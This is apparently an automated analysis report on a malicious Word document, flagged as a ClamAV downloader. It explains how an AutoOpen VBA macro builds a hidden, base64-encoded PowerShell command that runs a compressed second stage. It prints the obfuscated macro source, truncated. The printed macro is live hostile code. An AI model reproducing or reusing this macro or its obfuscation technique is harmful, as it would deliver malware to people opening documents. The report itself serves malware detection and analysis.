Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA project whose Autoopen subroutine calls RjJwWwlHXId(), which invokes Shell(). The command string is assembled at run time rather than stored literally: Chr(vbKeyP) yields "P", the literal "owers" follows, and the helper functions ADlif() and SuljhpbGfST() return further fragments that begin "HeLL -e " and continue with a long base64 string. The resulting command is therefore a PowerShell invocation with an encoded (-e, base64 over UTF-16LE) command. The second Shell() argument, 53344 - 53344, evaluates to 0 (vbHide), so the PowerShell window is never shown. Decoding the base64 that survives in the extracted source shows an Invoke-Expression call spelled from characters of $ShellId ([1] and [13] of "Microsoft.PowerShell", plus 'X', giving "ieX") applied to a StreamReader over a DeflateStream built from a FromBase64String buffer, i.e. a compressed second-stage script. That blob is cut off in the extracted source, so no download URL or C2 host is recoverable from this report; the downloader role is inferred from the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' and the decoded command's structure. The many CLng/CSng/ChrB assignments in the macro operate on variables that are never assigned and whose results are never used (the code runs under On Error Resume Next), so they are padding that obfuscates the few meaningful statements.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this report did recover a VBA project (macros.bas, below), so here the marker is redundant with the OLE_VBA_* findings and should not be read as a separate execution path.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into documents, not attacker infrastructure, and it is unrelated to the macro's PowerShell stage.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9229 bytes | 1f364312dcd0fb4ef9f69bdc90b2bb72720927f073b01898da142300010425b6 |

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "zVFhBOzwF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RjJwWwlHXId()
On Error Resume Next
pKbGS = CLng(69163 * CSng(FVHbf + ChrB(voVBi + CInt(88760))))
ipENnF = Int(oVicG)
jkGjt = TRVoJ
GRAsFR = OzazGN
NMPjm = UXZLhl
NaKJB = nhoXwQ
rsJJl = CLng(1290 * CSng(bEHBl + ChrB(iGirp + CInt(20955))))
KYnoQ = Int(KalYoT)
WnbOQ = jPfIT
YzQjw = hlwGSE
smpvq = SiRfri
aPiDi = Ufszt
RjJwWwlHXId = TMOUonvskKd + Shell(HuGGzuXbOG + Chr(TsCZQtY + vbKeyP + hjiYrnJw) + "owers" + ADlif + SuljhpbGfST + KcGjakQra + buSKN, 53344 - 53344)
mbHiWP = CLng(40676 * CSng(tXnqU + ChrB(cAaGTZ + CInt(5216))))
WRHtbB = Int(oAnvBD)
KAvQV = aCcnj
nTFmfU = HFqadn
mFXAv = lYqaK
DvETo = JnOQj
End Function
Sub Autoopen()
On Error Resume Next
HbKvw = CLng(39278 * CSng(RcCUV + ChrB(csRCPd + CInt(59329))))
cQvDlB = Int(UAFVV)
sTHqa = AtbBa
pMbrkw = EmfLPs
SSzbz = zUkYKM
HdiAPU = wofcQ
RjJwWwlHXId
iQXMI = CLng(84223 * CSng(MCivzD + ChrB(jUcChX + CInt(18532))))
aEiwuX = Int(inVLq)
jzXQS = cFvmB
slbMc = twCpTh
wavYv = oMKzW
lPIha = RdkBlp
End Sub
Attribute VB_Name = "KbRuOtipE"
Function ADlif()
On Error Resume Next
VjzPw = CLng(36777 * CSng(vMcjp + ChrB(qoFPoA + CInt(89090))))
ARbER = Int(dEMnz)
GKlZK = wKqHs
CozYI = jQKtVO
KjSpr = pmlcfC
FVBjRt = TBcCE
iWqnZnCm = "HeLL -" + "e LgAoACAAJA" + "BTAG" + "gAZQBsAE" + "wASQBEA" + "FsAMQBdAC" + "sAJ" + "ABTAEgA" + "ZQBMAGwAaQBEA" + "FsA"
NEjtNp = CLng(44083 * CSng(zmjVz + ChrB(DVRMS + CInt(42507))))
tNObbb = Int(FJEPlv)
kFrOpf = GiUOSl
zkQki = TqSSm
hvqiR = DVSQaz
qwniuM = qTHYn
CcCtLqvO = "MQAzAF0A" + "KwAnAFgA" + "JwApA" + "CAAKABOAGUAV" + "wAtAE" + "8AYgBqAG" + "UAQwB0ACAA"
CcTtnZ = CLng(54848 * CSng(wjQADi + ChrB(QDhKT + CInt(15557))))
WjMXFi = Int(NoRul)
aCYcAU = sNWiq
sZQaOU = KFnhP
wDlvz = RwoNi
JwHzJ = ijXlz
vvPLjHq = "aQBPAC4AcwBUA" + "HI" + "ARQBBAE" + "0AUgBFAEEARABlA" + "FIAKAAo" + "ACAATgBlAFcA"
NCaOXV = CLng(29494 * CSng(NjWwHR + ChrB(YZlDM + CInt(74480))))
FVPKw = Int(zjwMGo)
ziCZTw = qccKsr
JHmhlJ = zEzMZl
ikJqSk = tWLkNz
ctESEr = bKfUfq
TvMRELcvjV = "LQBPAGIA" + "agB" + "lAE" + "MAd" + "AAg"
aDNuMv = CLng(24689 * CSng(SUZHMQ + ChrB(azXJLU + CInt(22082))))
tUuBCZ = Int(WntaTT)
pBDSka = szfZrk
wVffOH = ZSuKS
wmOlwQ = HWGskk
BXPbK = wZSOvE
AXAsXoVi = "ACAAcwB5AHMAV" + "ABFAE0ALgBp" + "AE8AL" + "gBjAG8AbQ" + "BwAFIAZQBzAFMA" + "SQBvAE4AL"
fQiJI = CLng(33626 * CSng(lGitda + ChrB(ZZPmu + CInt(56939))))
SCDSzc = Int(YTAqrE)
rnwkTz = uoVwj
XzDbAb = NNfrI
uMmiCl = MilSB
iXXNhU = vUYQY
auXNGu = "gBkAGUAZgBs" + "AEEAdABl" + "AF" + "MAdABS" + "AGUAY" + "QBtACgAIABbA"
ADlif = iWqnZnCm + CcCtLqvO + vvPLjHq + TvMRELcvjV + AXAsXoVi + auXNGu
End Function
Function SuljhpbGfST()
On Error Resume Next
QpidIF = CLng(55113 * CSng(EMHFSM + ChrB(VoOka + CInt(48295))))
rpzwXs = Int(ZoVKMV)
dEdNYz = KPIOH
ZfKjz = TztdJ
kkfYmu = rhskk
BcXha = jPpUtd
YOnfPTVQEzG = "HMAeQBT" + "AFQARQ" + "BNAC4ASQBPAC4A" + "bQBFAE0AT" + "wByAFkAcwB"
MvBija = CLng(38721 * CSng(oMuldN + ChrB(QUhva + CInt(18282))))
pwQSmZ = Int(uQlvw)
KpwIJQ = NPcvwi
zVnzDf = GFRQn
MtwIqj = waVYlJ
iZTVW = wTZcn
oPolYD = "0AFIARQB" + "hAE0AXQAgAFsA" + "UwBZA" + "FMAdA" + "BlAE0ALgBDAE8Ab" + "gB2AEU" + "AcgB0A" + "F0AOg" + "A6AEYAUg" + "BvAE0AYgBh"
QRDkhr = CLng(42230 * CSng(iTTUE + ChrB(wdZzO + CInt(23482))))
Nhjlwu = Int(vtUTUw)
Nupoj = nnPGz
FJVta = bwCjX
kwqakz = AGAkjj
hwFZS = mjoVZz
qKQQJDO = "AFMAZQA2ADQAcw" + "B0AHIAaQBOAGcAK" + "AAnAFYAWQAvA" + "FIAVAA"
FszNdX = CLng(81456 * CSng(jZNDP + ChrB(wKFYm + CInt(20168))))
jftdR = Int(NEHUAk)
uHGnH = tGwXs
CTnVj = npiYNG
MadzbE = SKMrD
RaRJi = BGPcZ
dWIabfd = "4AEkAd" + "wBFAE0A" + "Yg" + "AvAGwAVAA" + "0AD" + "AAMgBSAGEAbABD" + "ACsASwBEADAAaA" + "BCAE4AUQBJ" + "AGcAeABLAHM"
YYNvbV = CLng(89174 * CSng(DulPGW + ChrB(fErHv + CInt(34462))))
fMYUq = Int(FdwzD)
DjzXj = wEPWpB
M ... (truncated)
```